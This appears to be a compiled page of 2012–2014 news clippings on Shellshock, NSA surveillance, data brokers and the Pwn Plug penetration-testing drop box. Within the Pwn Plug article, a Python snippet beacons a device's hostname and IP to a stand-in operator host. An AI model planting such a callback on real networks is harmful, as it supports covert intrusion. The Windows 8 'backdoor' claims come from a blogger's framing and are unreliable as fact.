Of these, Web server attacks seem to be the most common by far. As Florian Weimer, a Red Hat security engineer, wrote: "HTTP requests to CGI scripts have been identified as the major attack vector." Attacks are being made against systems running both Linux and Mac OS X.
Jaime Blasco, labs director at AlienVault, a security management services company, ran a honeypot looking for attackers and found "several machines trying to exploit the Bash vulnerability. The majority of them are only probing to check if systems are vulnerable. On the other hand, we found two worms that are actively exploiting the vulnerability and installing a piece of malware on the system."
Other security researchers have found that the malware is the usual sort. They typically try to plant distributed denial of service (DDoS) IRC bots and attempt to guess system logins and passwords using a list of poor passwords such as 'root', 'admin', 'user', 'login', and '123456.'
So, how do you know if your servers can be attacked? First, you need to check to see if you're running a vulnerable version of Bash. To do that, run the following command from a Bash shell:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If you get the result:
vulnerable
this is a test
Bad news, your version of Bash can be hacked. If you see:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test
You're good. Well, to be more exact, you're as protected as you can be at the moment.
http://support.novell.com/security/cve/CVE-2014-6271.html
Updated information on the bash fixes.
Sep 26, 2014 | support.novell.com
We have fixed the critical issue CVE-2014-6271 (http://support.novell.com/security/cve/CVE-2014-6271.html) with updates for all supported and LTSS code streams.
SLES 10 SP3 LTSS, SP4 LTSS, SLES 11 SP1 LTSS, SLES 11 SP2 LTSS, SLES 11 SP3, openSUSE 12.3, 13.1.
The issue CVE-2014-7169 ( http://support.novell.com/security/cve/CVE-2014-7169.html) is less severe (no trivial code execution) but will also receive fixes for the code streams above. As more patches are under discussion around the Bash parser, we will wait some days to collect them, to avoid a third bash update.
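On affected SUSE systems the corresponding update is equally small; a minimal sketch (LTSS streams pull the fix from their own update channels):

zypper refresh && zypper update bash   # then verify with: rpm -q bash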
[Jan 08, 2014] German Government CONFIRMS Key Entities Not To Use Windows 8 with TPM 2.0, Fearing Control by ‘Third Parties’ (Such As NSA) by Wolf Richter
08/26/2013 | www.testosteronepit.com
I expected the German Federal Office for Security in Information Technology (BSI) to contact me in an icily polite but firm manner and make me recant, and I almost expected some goons to show up with an offer I couldn’t refuse, and I half expected Microsoft to shut down my computers remotely and wipe out all my data and make me, as the Japanese say, cry into my pillow for weeks, or something. But none of that happened.
Instead, the BSI officially confirmed on its website the key statements in what has become my most popular article ever. On my humble site alone, it was read over 44,000 times so far, received over 2,090 Facebook “likes,” and was tweeted over 530 times. Here it is: LEAKED: German Government Warns Key Entities Not To Use Windows 8 – Links The NSA.
Internal documents from the BSI that were leaked to Die Zeit described how Windows 8, in conjunction with the new Trusted Platform Module (TPM 2.0) – “a special surveillance chip,” it has been called – allowed Microsoft to control computers remotely through a built-in backdoor, with no possibility for the user to opt in or opt out. The goal is Digital Rights Management and computer security. Through remote access via this backdoor, Microsoft determines what software is allowed to run on the computer, and what software, such as illegal copies or viruses and Trojans, should be disabled. Keys to that backdoor are likely accessible to the NSA – and in an ironic twist, perhaps even to the Chinese.
Users of Windows 8 with TPM 2.0 (the standard configuration and not an option) surrender control over their machine the moment they turn it on. For that reason, according to the leaked documents, experts at the BSI warned the German Federal Administration and other key users against deploying computers with Windows 8 and TPM 2.0.
The BSI could have brushed off these leaked documents as fakes or rumors, or whatnot. But instead, in response to “media reports,” it decided to clarify a few points on its website, and in doing so, confirmed the key elements. Here are the salient points:
For specific user groups, the use of Windows 8 in combination with TPM may well mean an increase in security. This includes users who, for various reasons, cannot or do not want to take care of the security of their system, but trust that the manufacturer of the system provides and maintains a secure solution. This is a valid user scenario, but the manufacturer should provide sufficient transparency about the potential limitations of the architecture and possible consequences of its use.
From the perspective of the BSI, the use of Windows 8 in combination with TPM 2.0 is accompanied by a loss of control over the operating system and the hardware. This results in new risks for the user, specifically for the Federal Administration and critical infrastructure.
It explains how “unintentional errors” could cause hardware and software to become permanently useless, which “would not be acceptable” for the Federal Administration or for other users. “In addition, the newly established mechanisms can also be used for sabotage by third parties.”
Among them: the NSA and possibly the Chinese.
The BSI considers complete control over the information technology – including a conscious opt-in and later the possibility of an opt-out – a fundamental condition for a responsible use of hardware and operating system.
Since these conditions have not been met, the BSI has warned the “Federal Administration and critical infrastructure users” not to use the Windows 8 with TPM 2.0. The BSI said that it remained in contact with the Trusted Computing Group as well as with makers of operating systems and hardware “in order to find appropriate solutions” (whole text in German).
This alleged connection between Windows and the NSA isn’t new. Geeks have for years tried to document how Microsoft has been cooperating with the NSA and other members of the US Intelligence Community in designing its operating systems. For example, rumors bubbled up in 2007 that computers with Vista, at the time Microsoft’s latest and greatest (and much despised) operating system, automatically established a connection to, among others, the Department of Defense Information Center and Halliburton Company, back then the Darth Vader of Corporate America.
The Windows 8 debacle comes on top of the breathless flow of Edward Snowden’s revelations and paints a much more detailed picture of how the NSA’s spying activities are dependent on Corporate America. These revelations are already slamming tech companies [my take: US Tech Companies Raked Over The Coals In China ] as they find it harder to sell their allegedly compromised products overseas. Which foreign government or corporation would now want to use Windows 8 with TPM 2.0?
Or is this – and the entire hullabaloo about the Snowden revelations – just another item in the governmental and corporate category of “This Too Shall Pass?” The answer lies in this paragraph:
No laws define the limits of the NSA’s power. No Congressional committee subjects the agency’s budget to a systematic, informed and skeptical review. With unknown billions of Federal dollars, the agency purchases the most sophisticated communications and computer equipment in the world. But truly to comprehend the growing reach of this formidable organization, it is necessary to recall once again how the computers that power the NSA are also gradually changing lives of Americans....
The year? Not 2013. But thirty years ago.
It was published by the New York Times in 1983, adapted from David Burnham’s book, The Rise of the Computer State [brought to my attention by @mark_white0]. And we’re still going down the same road. Only now, we’re a lot further along. No wonder that tech companies, government agencies, and Congress alike think that this too shall pass. Because it has always done so before.
So, here is my offending article: LEAKED: German Government Warns Key Entities Not To Use Windows 8 – Links The NSA.
Author webpage: www.amazon.com/author/wolfrichter
[Jan 08, 2014] Apple Says It Is ‘Unaware’ of N.S.A. iPhone Hack Program By NICOLE PERLROTH
"It can also turn the iPhone into a “hot mic” using the phone’s own microphone as a recording device and capture images via the iPhone’s camera. (Reminder to readers: Masking tape is not a bad idea)."
Dec 31, 2013 | NYT
The agency described DROPOUTJEEP as a “software implant for Apple iPhone” that has all kinds of handy spy capabilities. DROPOUTJEEP can pull or push information onto the iPhone, snag SMS text messages, contact lists, voicemail and a person’s geolocation, both from the phone itself and from cell towers in close proximity.
It can also turn the iPhone into a “hot mic” using the phone’s own microphone as a recording device and capture images via the iPhone’s camera. (Reminder to readers: Masking tape is not a bad idea).
But the Der Spiegel report is based on information that is over five years old. The slide, dated January 2007 and last updated October 2008, claims that the agency requires close physical proximity to the iPhone to install DROPOUTJEEP.
“The initial release of DROPOUTJEEP will focus on installing the implant via close access methods,” the N.S.A. slide says. Then, “A remote installation capability will be pursued for a future release.”
Based on the timing of the report, the agency would have been targeting Apple’s iOS5 operating system. Apple released its latest iOS7 operating system last September.
[Dec 27, 2013] N.S.A. Phone Surveillance Is Lawful, Federal Judge Rules
In one of the concurrences, Justice Sonia Sotomayor wrote that “it may be necessary to reconsider the premise that an individual has no reasonable expectation of privacy in information voluntarily disclosed to third parties.”
NYTimes.com
The main dispute between Judge Pauley and Judge Leon was over how to interpret a 1979 Supreme Court decision, Smith v. Maryland, in which the court said a robbery suspect had no reasonable expectation that his right to privacy extended to the numbers dialed from his phone.
“Smith’s bedrock holding is that an individual has no legitimate expectation of privacy in information provided to third parties,” Judge Pauley wrote.
But Judge Leon said in his ruling that advances in technology and suggestions in concurring opinions in later Supreme Court decisions had undermined Smith. The government’s ability to construct a mosaic of information from countless records, he said, called for a new analysis of how to apply the Fourth Amendment’s prohibition of unreasonable government searches.
Judge Pauley disagreed. “The collection of breathtaking amounts of information unprotected by the Fourth Amendment does not transform that sweep into a Fourth Amendment search,” he wrote.
He acknowledged that “five justices appeared to be grappling with how the Fourth Amendment applies to technological advances” in a pair of 2012 concurrences in United States v. Jones. In that decision, the court unanimously rejected the use of a GPS device to track the movements of a drug suspect over a month. The majority in the 2012 case said that attaching the device violated the defendant’s property rights.
In one of the concurrences, Justice Sonia Sotomayor wrote that “it may be necessary to reconsider the premise that an individual has no reasonable expectation of privacy in information voluntarily disclosed to third parties.”
But Judge Pauley wrote that the 2012 decision did not overrule the one from 1979. “The Supreme Court,” he said, “has instructed lower courts not to predict whether it would overrule a precedent even if its reasoning has been supplanted by later cases.”
As for changes in technology, he wrote, customers’ “relationship with their telecommunications providers has not changed and is just as frustrating.”
[Dec 27, 2013] What Surveillance Valley knows about you By Yasha Levine
December 22, 2013 Crooks and Liars
“In 2012, the data broker industry generated $150 billion in revenue; that’s twice the size of the entire intelligence budget of the United States government—all generated by the effort to detail and sell information about our private lives.”

— Senator Jay Rockefeller IV

“Quite simply, in the digital age, data-driven marketing has become the fuel on which America’s free market engine runs.”

— Direct Marketing Association
* * *
Google is very secretive about the exact nature of its for-profit intel operation and how it uses the petabytes of data it collects on us every single day for financial gain. Fortunately, though, we can get a sense of the kind of info that Google and other Surveillance Valley megacorps compile on us, and the ways in which that intel might be used and abused, by looking at the business practices of the “data broker” industry.
Thanks to a series of Senate hearings, the business of data brokerage is finally being understood by consumers, but the industry got its start back in the 1970s as a direct outgrowth of the failure of telemarketing. In its early days, telemarketing had an abysmal success rate: only 2 percent of people contacted would become customers. In his book, “The Digital Person,” Daniel J. Solove explains what happened next:
To increase the low response rate, marketers sought to sharpen their targeting techniques, which required more consumer research and an effective way to collect, store, and analyze information about consumers. The advent of the computer database gave marketers this long sought-after ability — and it launched a revolution in targeting technology.
Data brokers rushed in to fill the void. These operations pulled in information from any source they could get their hands on — voter registration, credit card transactions, product warranty information, donations to political campaigns and non-profits, court records — storing it in master databases and then analyzing it in all sorts of ways that could be useful to direct-mailing and telemarketing outfits. It wasn’t long before data brokers realized that this information could be used beyond telemarketing, and quickly evolved into a global for-profit intelligence business that serves every conceivable data and intelligence need.
Today, the industry churns somewhere around $200 billion in revenue annually. There are up to 4,000 data broker companies — some of the biggest are publicly traded — and together, they have detailed information on just about every adult in the western world.
No source of information is sacred: transaction records are bought in bulk from stores, retailers and merchants; magazine subscriptions are recorded; food and restaurant preferences are noted; public records and social networks are scoured and scraped. What kind of prescription drugs did you buy? What kind of books are you interested in? Are you a registered voter? To what non-profits do you donate? What movies do you watch? Political documentaries? Hunting reality TV shows?
That info is combined and kept up to date with address, payroll information, phone numbers, email accounts, social security numbers, vehicle registration and financial history. And all that is sliced, isolated, analyzed and mined for data about you and your habits in a million different ways.
The dossiers are not restricted to generic market segmenting categories like “Young Literati” or “Shotguns and Pickups” or “Kids & Cul-de-Sacs,” but often contain the most private and intimate details about a person’s life, all of it packaged and sold over and over again to anyone willing to pay.
Take MEDbase200, a boutique for-profit intel outfit that specializes in selling health-related consumer data. Well, until last week, the company offered its clients a list of rape victims (or “rape sufferers,” as the company calls them) at the low price of $79.00 per thousand. The company claims to have segmented this data set into hundreds of different categories, including stuff like the ailments they suffer, prescription drugs they take and their ethnicity:
These rape sufferers are family members who have reported, or have been identified as individuals affected by specific illnesses, conditions or ailments relating to rape. Medbase200 is the owner of this list. Select from families affected by over 500 different ailments, and/or who are consumers of over 200 different Rx medications. Lists can be further selected on the basis of lifestyle, ethnicity, geo, gender, and much more. Inquire today for more information.
MEDbase promptly took its “rape sufferers” list off line last week after its existence was revealed in a Senate investigation into the activities of the data-broker industry. The company pretended like the list was a huge mistake. A MEDbase rep tried convincing a Wall Street Journal reporter that its rape dossiers were just a “hypothetical list of health conditions/ailments.” The rep promised it was never sold to anyone. Yep, it was a big mistake. We can all rest easy now. Thankfully, MEDbase has hundreds of other similar dossier collections, hawking the most private and sensitive medical information.
For instance, if lists of rape victims aren’t your thing, MEDbase can sell dossiers on people suffering from anorexia, substance abuse, AIDS and HIV, Alzheimer’s Disease, Asperger Disorder, Attention Deficit Hyperactivity Disorder, Bedwetting (Enuresis), Binge Eating Disorder, Depression, Fetal Alcohol Syndrome, Genital Herpes, Genital Warts, Gonorrhea, Homelessness, Infertility, Syphilis… the list goes on and on and on and on.
Normally, such detailed health information would fall under federal law and could not be disclosed or sold without consent. But because these data harvesters rely on indirect sources of information instead of medical records, they’re able to sidestep regulations put in place to protect the privacy of people’s health data.
MEDbase isn’t the only company exploiting these loopholes. By the industry’s own estimates, there are something like 4,000 for-profit intel companies operating in the United States. Many of them sell information that would normally be restricted under federal law. They offer all sorts of targeted dossier collections on every population segment of our society, from the affluent to the extremely vulnerable:
- people with drug addictions
- detailed personal info on police officers and other government employees
- people with bad credit/bankruptcies
- minorities who’ve used payday loan services
- domestic violence shelter locations (normally these addresses would be shielded by law)
- elderly gamblers
If you want to see how this kind of profile data can be used to scam unsuspecting individuals, look no further than the case of Richard Guthrie, an Iowa retiree who had his life savings siphoned out of his bank account. The scammers’ weapon of choice: databases bought from large for-profit data brokers listing retirees who entered sweepstakes and bought lottery tickets.
Here’s a 2007 New York Times story describing the racket:
Mr. Guthrie, who lives in Iowa, had entered a few sweepstakes that caused his name to appear in a database advertised by infoUSA, one of the largest compilers of consumer information. InfoUSA sold his name, and data on scores of other elderly Americans, to known lawbreakers, regulators say.
InfoUSA advertised lists of “Elderly Opportunity Seekers,” 3.3 million older people “looking for ways to make money,” and “Suffering Seniors,” 4.7 million people with cancer or Alzheimer’s disease. “Oldies but Goodies” contained 500,000 gamblers over 55 years old, for 8.5 cents apiece. One list said: “These people are gullible. They want to believe that their luck can change.”
Data brokers argue that cases like Guthrie’s are an anomaly — a once-in-a-blue-moon tragedy in an industry that takes privacy and legal conduct seriously. But cases of identity thieves and sophisticated con rings obtaining data from for-profit intel businesses abound. Scammers are a lucrative source of revenue. Their money is just as good as anyone else’s. And some of the profile “products” offered by the industry seem tailored specifically to fraud use.
As Royal Canadian Mounted Police Sergeant Yves Leblanc told the New York Times: “Only one kind of customer wants to buy lists of seniors interested in lotteries and sweepstakes: criminals. If someone advertises a list by saying it contains gullible or elderly people, it’s like putting out a sign saying ‘Thieves welcome here.’”
So what is InfoUSA, exactly? What kind of company would create and sell lists customized for use by scammers and cons?
As it turns out, InfoUSA is not some fringe or shady outfit, but a hugely profitable politically connected company. InfoUSA was started by Vin Gupta in the 1970s as a basement operation hawking detailed lists of RV and mobile home dealers. The company quickly expanded into other areas and began providing business intel services to thousands of businesses. By 2000, the company raised more than $30 million in venture capital funding from major Silicon Valley venture capital firms.
By then, InfoUSA boasted of having information on 230 million consumers. A few years later, InfoUSA counted the biggest Valley companies as its clients, including Google, Yahoo, Microsoft and AOL. It got involved not only in raw data and dossiers, but moved into payroll and financial services, conducted polling and opinion research, partnered with CNN, vetted employees and provided customized services for law enforcement and all sorts of federal and government agencies: processing government payments, helping states locate tax cheats and even administering President Bill Clinton’s “Welfare to Work” program. Which is not surprising, as Vin Gupta is a major and close political supporter of Bill and Hillary Clinton.
In 2008, Gupta was sued by InfoUSA shareholders for inappropriately using corporate funds. Shareholders accused Gupta of illegally funneling corporate money to fund an extravagant lifestyle and curry political favor. According to the Associated Press, the lawsuit questioned why Gupta used private corporate jets to fly the Clintons on personal and campaign trips, and why Gupta awarded Bill Clinton a $3.3 million consulting gig.
As a result of the scandal, InfoUSA was threatened with delisting from Nasdaq, Gupta was forced out and the company was snapped up for half a billion dollars by CCMP Capital Advisors, a major private equity firm spun off from JP Morgan in 2006. Today, InfoUSA continues to do business under the name Infogroup, and has nearly 4,000 employees working in nine countries.
As big as Infogroup is, there are dozens of other for-profit intelligence businesses that are even bigger: massive multi-national intel conglomerates with revenues in the billions of dollars. Some of them, like Lexis-Nexis and Experian, are well known, but mostly these are outfits that few Americans have heard of, with names like Epsilon, Altegrity and Acxiom.
These for-profit intel behemoths are involved in everything from debt collection to credit reports to consumer tracking to healthcare analysis, and provide all manner of tailored services to government and law enforcement around the world. For instance, Acxiom has done business with most major corporations, and boasts of intel on “500 million active consumers worldwide, with about 1,500 data points per person. That includes a majority of adults in the United States,” according to the New York Times.
This data is analyzed and sliced in increasingly sophisticated and intrusive ways to profile and predict behavior. Merchants are using it to customize the shopping experience: Target launched a program to figure out if a woman shopper was pregnant and when the baby would be born, “even if she didn’t want us to know.” Life insurance companies are experimenting with predictive consumer intel to estimate life expectancy and determine eligibility for life insurance policies. Meanwhile, health insurance companies are raking over this data in order to deny and challenge the medical claims of their policyholders.
Even more alarming, large employers are turning to for-profit intelligence to mine and monitor the lifestyles and habits of their workers outside the workplace. Earlier this year, the Wall Street Journal described how employers have partnered with health insurance companies to monitor workers for “health-adverse” behavior that could lead to higher medical expenses down the line:
Your company already knows whether you have been taking your meds, getting your teeth cleaned and going for regular medical checkups. Now some employers or their insurance companies are tracking what staffers eat, where they shop and how much weight they are putting on — and taking action to keep them in line.
But companies also have started scrutinizing employees’ other behavior more discreetly. Blue Cross and Blue Shield of North Carolina recently began buying spending data on more than 3 million people in its employer group plans. If someone, say, purchases plus-size clothing, the health plan could flag him for potential obesity — and then call or send mailings offering weight-loss solutions.
…”Everybody is using these databases to sell you stuff,” says Daryl Wansink, director of health economics for the Blue Cross unit. “We happen to be trying to sell you something that can get you healthier.”
“As an employer, I want you on that medication that you need to be on,” Julie Stone, an HR expert at Towers Watson, told the Wall Street Journal.
Companies might try to frame it as a health issue. I mean, what kind of asshole could be against employers caring about the wellbeing of their workers? But their ultimate concern has nothing to do with employee health. It’s all about the brutal bottom line: keeping costs down.
An employer monitoring and controlling your activity outside of work? You don’t have to be a union agitator to see the problems with this kind of mindset and where it could lead. Because there are lots of things that some employers might want to know about your personal life, and not only to “keep costs down.” It could be anything: to weed out people based on undesirable habits or to discriminate against workers based on sexual orientation, religion and political beliefs.
It’s not difficult to imagine that a large corporation facing labor unrest or a unionization drive would be interested in proactively flagging potential troublemakers by pinpointing employees that might be sympathetic to the cause. And the technology and data are already here for wide and easy application: did a worker watch certain political documentaries, donate to environmental non-profits, join an animal rights Facebook group, tweet out support for Occupy Wall Street, subscribe to the Nation or Jacobin, buy Naomi Klein’s “Shock Doctrine”? Or maybe the worker simply rented one of Michael Moore’s films? Run your payroll through one of the massive consumer intel databases and see if there are any matches. Bound to be plenty of unpleasant surprises for HR!
This has happened in the past, although in a cruder and more limited way. In the 1950s, for instance, some lefty intellectuals had their lefty newspapers and mags delivered to P.O. boxes instead of their home address, worrying that otherwise they’d get tagged as Commie symps. That might have worked in the past. But with the power of private intel companies, today there’s nowhere to hide.
FTC Commissioner Julie Brill has repeatedly voiced concern that unregulated data being amassed by for-profit intel companies would be used to discriminate and deny employment, and to determine consumer access to everything from credit to insurance to housing. “As Big Data algorithms become more accurate and powerful, consumers need to know a lot more about the ways in which their data is used,” she told the Wall Street Journal.
Pam Dixon, executive director of the World Privacy Forum, agrees. Dixon frequently testifies on Capitol Hill to warn about the growing danger to privacy and civil liberties posed by big data and for-profit intelligence. In Congressional testimony back in 2009, Dixon called this growing mountain of data the “modern permanent record” and explained that users of these new intel capabilities will inevitably expand to include not just marketers and law enforcement, but insurance companies, employers, landlords, schools, parents, scammers and stalkers. “The information – like credit reports – will be used to make basic decisions about the ability of individuals to travel, participate in the economy, find opportunities, find places to live, purchase goods and services, and make judgments about the importance, worthiness, and interests of individuals.”
* * *
For the past year, Chairman John D. (Jay) Rockefeller IV has been conducting a Senate Commerce Committee investigation of the data broker industry and how it affects consumers. The committee finished its investigation last week without reaching any real conclusions, but issued a report warning about the dangers posed by the for-profit intel industry and the need for further action by lawmakers. The report noted with concern that many of these firms failed to cooperate with the investigation into their business practices:
Data brokers operate behind a veil of secrecy. Three of the largest companies – Acxiom, Experian, and Epsilon – to date have been similarly secretive with the Committee with respect to their practices, refusing to identify the specific sources of their data or the customers who purchase it. … The refusal by several major data broker companies to provide the Committee complete responses regarding data sources and customers only reinforces the aura of secrecy surrounding the industry.
Rockefeller’s investigation was an important first step breaking open this secretive industry, but it was missing one notable element. Despite its focus on companies that feed on people’s personal data, the investigation did not include Google or the other big Surveillance Valley data munchers. And that’s too bad. Because if anything, the investigation into data brokers only highlighted the danger posed by the consumer-facing data companies like Google, Facebook, Yahoo and Apple.
As intrusive as data brokers are, the level of detail in the information they compile on Americans pales to what can be vacuumed up by a company like Google. To compile their dossiers, traditional data brokers rely on mostly indirect intel: what people buy, where they vacation, what websites they visit. Google, on the other hand, has access to the raw uncensored contents of your inner life: personal emails, chats, the diary entries and medical records that we store in the cloud, our personal communication with doctors, lawyers, psychologists, friends. Data brokers know us through our spending habits. Google accesses the unfiltered details of our personal lives.
A recent study showed that Americans are overwhelmingly opposed to having their online activity tracked and analyzed. Seventy-three percent of people polled for the Pew Internet & American Life Project viewed the tracking of their search history as an invasion of privacy, while 68 percent were against targeted advertising, replying: “I don’t like having my online behavior tracked and analyzed.”
This isn’t news to companies like Google, which last year warned shareholders: “Privacy concerns relating to our technology could damage our reputation and deter current and potential users from using our products and services.”
Little wonder then that Google, and the rest of Surveillance Valley, is terrified that the conversation about surveillance could soon broaden to include not only government espionage, but for-profit spying as well.
[Jul 23, 2012] The Onion Facebook Is CIA's Dream Come True [SATIRE] by Stan Schroeder
Compare with Assange- Facebook, Google, Yahoo spying tools for US intelligence
As the “single most powerful tool for population control,” the CIA’s “Facebook program” has dramatically reduced the agency’s costs — at least according to the latest “report” from the satirical mag The Onion.
Perhaps inspired by a recent interview with WikiLeaks founder Julian Assange, who called Facebook “the most appalling spy machine that has ever been invented,” The Onion‘s video fires a number of arrows in Facebook’s direction — with hilarious results.
In the video, Facebook founder Mark Zuckerberg is dubbed “The Overlord” and is shown receiving a “medal of intelligence commendation” for his work with the CIA’s Facebook program.
The Onion also takes a jab at FarmVille (which is responsible for “pacifying” as many as 85 million people after unemployment rates rose), Twitter (which is called useless as far as data gathering goes), and Foursquare (which is said to have been created by Al Qaeda).
CIA's 'Facebook' Program Dramatically Cut Agency's Costs Onion News Network
[Apr 17, 2012] The Pwn Plug is a little white box that can hack your network By Robert McMillan,
wired.com

Easy to overlook, the Pwn Plug offers a tiny back door to the corporate network.
When Jayson E. Street broke into the branch office of a national bank in May of last year, the branch manager could not have been more helpful. Dressed like a technician, Street walked in and said he was there to measure "power fluctuations on the power circuit." To do this, he'd need to plug a small white device that looked like a power adapter onto the wall.
The power fluctuation story was total BS, of course. Street had been hired by the bank to test out security at 10 of its West Coast branch offices. He was conducting what's called a penetration test. This is where security experts pretend to be bad guys in order to spot problems.
In this test, bank employees were only too willing to help out. They let Street go anywhere he wanted—near the teller windows, in the vault—and plug in his little white device, called a Pwn Plug.
"At one branch, the bank manager got out of the way so I could put it behind her desk," Street says. The bank, which Street isn't allowed to name, called the test off after he'd broken into the first four branches. "After the fourth one they said, 'Stop now please. We give up.'"
Built by a startup company called Pwnie Express, the Pwn Plug is pretty much the last thing you ever want to find on your network—unless you've hired somebody to put it there. It's a tiny computer that comes preloaded with an arsenal of hacking tools. It can be quickly plugged into any computer network and then used to access it remotely from afar. And it comes with "stealthy decal stickers"—including a little green flowerbud with the word "fresh" underneath it, that makes the device look like an air freshener—so that people won't get suspicious.
The Pwn Plug installed during Street's May penetration test (photo: Jayson E. Street)
The basic model costs $480, but if you're willing to pay an extra $250 for the Elite version, you can connect it over the mobile wireless network. "The whole point is plug and pwn," says Dave Porcello, Pwnie Express's CEO. "Walk into a facility, plug it in, wait for the text message. Before you even get to the parking lot you should know it's working."
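Porcello's "wait for the text message" workflow is, at bottom, just an outbound beacon from the device. Here is a minimal sketch of the idea in Python; the callback URL is a hypothetical operator endpoint, not Pwnie Express's actual mechanism:

```python
# Minimal "phone home" beacon of the kind a drop box sends once it
# finds itself on a network. The callback URL is a hypothetical
# operator endpoint, not Pwnie Express's actual mechanism (the Elite
# model can also call out over a cellular modem).
import json
import socket
import urllib.request

CALLBACK_URL = "https://operator.example/checkin"   # hypothetical

def local_ip():
    # Connecting a UDP socket picks the local interface that routes
    # outward; no packets are actually sent by connect() on UDP.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.connect(("192.0.2.1", 53))
        return s.getsockname()[0]

payload = json.dumps({"host": socket.gethostname(),
                      "ip": local_ip()}).encode()
req = urllib.request.Request(CALLBACK_URL, data=payload,
                             headers={"Content-Type": "application/json"})
urllib.request.urlopen(req, timeout=10)
print("checked in; the operator now knows the box is live")
```

Because the beacon travels outbound, a typical perimeter firewall waves it straight through, which is the whole point of a drop box.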
Porcello decided to start making the Pwn Plug after coming across the SheevaPlug, a miniature low-power Linux computer built by Globalscale Technologies that looks just like a power adapter. "I saw it and I was like, 'Oh my god this is the hacker's dropbox,'" Porcello says. Dropboxes have been around for a few decades, but until now they've been customized computers that hackers or pen testers like Street build and sneak, unobserved, onto corporate networks.
Now Pwnie Express has taken the idea commercial and built a product that anyone can easily configure and use. It turns out the devices are also a great way for corporations to test security at their regional offices. Porcello says that Bank of America is mailing the Pwn Plug to its regional offices and having bank managers plug them into the network. Then security experts at corporate HQ can check the network for vulnerabilities.
An Internet service provider—Porcello wasn't allowed to name it—is using the devices to remotely connect to regional offices via a GSM mobile wireless network and troubleshoot networking problems.
The device can save companies big money, Porcello says. "You've got companies like T.J.Maxx that have thousands of retail stores and every single one of them has got a computer network," he says. "Right now they're actually flying people out to the stores to spot-check and do penetration tests, but now with something like this you don't have to travel."
Porcello was just a bored security manager at an insurance company when he started building the Pwn Plugs back in 2010. But pretty soon he was selling enough to quit his day job. "We started getting orders from Fortune 50 companies and the DoD and I was like, 'OK I'll do this now instead.'"
[Feb 15, 2012] Cyberwar Is the New Yellowcake Threat Level By Jerry Brito and Tate Watkins
Now all this needs to be reassessed in light of the latest NSA revelations...
February 14, 2012 | Wired.com
In last month’s State of the Union address, President Obama called on Congress to pass “legislation that will secure our country from the growing dangers of cyber threats.” The Hill was way ahead of him, with over 50 cybersecurity bills introduced this Congress. This week, both the House and Senate are moving on their versions of consolidated, comprehensive legislation.
The reason cybersecurity legislation is so pressing, proponents say, is that we face an immediate risk of national disaster.
“Today’s cyber criminals have the ability to interrupt life-sustaining services, cause catastrophic economic damage, or severely degrade the networks our defense and intelligence agencies rely on,” Senate Commerce Committee Chairman Jay Rockefeller (D-W.Va.) said at a hearing last week. “Congress needs to act on comprehensive cybersecurity legislation immediately.”
Yet evidence to sustain such dire warnings is conspicuously absent. In many respects, rhetoric about cyber catastrophe resembles threat inflation we saw in the run-up to the Iraq War. And while Congress’ passing of comprehensive cybersecurity legislation wouldn’t lead to war, it could saddle us with an expensive and overreaching cyber-industrial complex.
In 2002 the Bush administration sought to make the case that Iraq threatened its neighbors and the United States with weapons of mass destruction (WMD). By framing the issue in terms of WMD, the administration conflated the threats of nuclear, biological, and chemical weapons. The destructive power of biological and chemical weapons—while no doubt horrific—is minor compared to that of nuclear detonation. Conflating these threats, however, allowed the administration to link the unlikely but serious threat of a nuclear attack to the more likely but less serious threat posed by biological and chemical weapons.
Similarly, proponents of regulation often conflate cyber threats.
In his 2010 bestseller Cyber War, Richard Clarke warns that a cyberattack today could result in the collapse of the government’s classified and unclassified networks, the release of “lethal clouds of chlorine gas” from chemical plants, refinery fires and explosions across the country, midair collisions of 737s, train derailments, the destruction of major financial computer networks, suburban gas pipeline explosions, a nationwide power blackout, and satellites in space spinning out of control. He assures us that “these are not hypotheticals.” But the only verifiable evidence he presents relates to several well-known distributed denial of service (DDOS) attacks, and he admits that DDOS is a “primitive” form of attack that would not pose a major threat to national security.
When Clarke ventures beyond DDOS attacks, his examples are easily debunked. To show that the electrical grid is vulnerable, for example, he suggests that the Northeast power blackout of 2003 was caused in part by the “Blaster” worm. But the 2004 final report of the joint U.S.-Canadian task force that investigated the blackout found that no virus, worm, or other malicious software contributed to the power failure. Clarke also points to a 2007 blackout in Brazil, which he says was the result of criminal hacking of the power system. Yet investigations have concluded that the power failure was the result of soot deposits on high-voltage insulators on transmission lines.
Clarke’s readers would no doubt be as frightened at the prospect of a cyber attack as they might have been at the prospect of Iraq passing nuclear weapons to al Qaeda. Yet evidence that cyberattacks and cyberespionage are real and serious concerns is not evidence that we face a grave risk of national catastrophe, just as evidence of chemical or biological weapons is not evidence of the ability to launch a nuclear strike.
The Bush administration claimed that Iraq was close to acquiring nuclear weapons but provided no verifiable evidence. The evidence they did provide—Iraq’s alleged pursuit of uranium “yellowcake” from Niger and its purchase of aluminum tubes allegedly meant for uranium enrichment centrifuges—was ultimately determined to be unfounded.
Despite the lack of verifiable evidence to support the administration’s claims, the media tended to report them unquestioned. Initial reporting on the aluminum tubes claim, for example, came in the form of a front page New York Times article by Judith Miller and Michael Gordon that relied entirely on anonymous administration sources.
Appearing on Meet the Press the same day the story was published, Vice President Dick Cheney answered a question about evidence of a reconstituted Iraqi nuclear program by stating that, while he couldn’t talk about classified information, The New York Times was reporting that Iraq was seeking to acquire aluminum tubes to build a centrifuge. In essence, the Bush administration was able to cite its own leak—with the added imprimatur of the Times—as a rationale for war.
The media may be contributing to threat inflation today by uncritically reporting alarmist views of potential cyber threats. For example, a 2009 front page Wall Street Journal story reported that the U.S. power grid had been penetrated by Chinese and Russian hackers and laced with logic bombs. The article is often cited as evidence that the power grid is rigged to blow.
Yet similar to Judith Miller’s Iraq WMD reporting, the only sources for the article’s claim that infrastructure has been compromised are anonymous U.S. intelligence officials. With little specificity about the alleged infiltrations, readers are left with no way to verify the claims. More alarmingly, when Sen. Susan Collins (R-Maine) took to the Senate floor to introduce the comprehensive cybersecurity bill that she co-authored with Sen. Joe Lieberman (I-Conn.), the evidence she cited to support a pressing need for regulation included this very Wall Street Journal story.
Washington teems with people who have a vested interest in conflating and inflating threats to our digital security. The watchword, therefore, should be “trust but verify.” In his famous farewell address to the nation in 1961, President Dwight Eisenhower warned against the dangers of what he called the “military-industrial complex”: an excessively close nexus between the Pentagon, defense contractors, and elected officials that could lead to unnecessary expansion of the armed forces, superfluous military spending, and a breakdown of checks and balances within the policy making process. Eisenhower’s speech proved prescient.
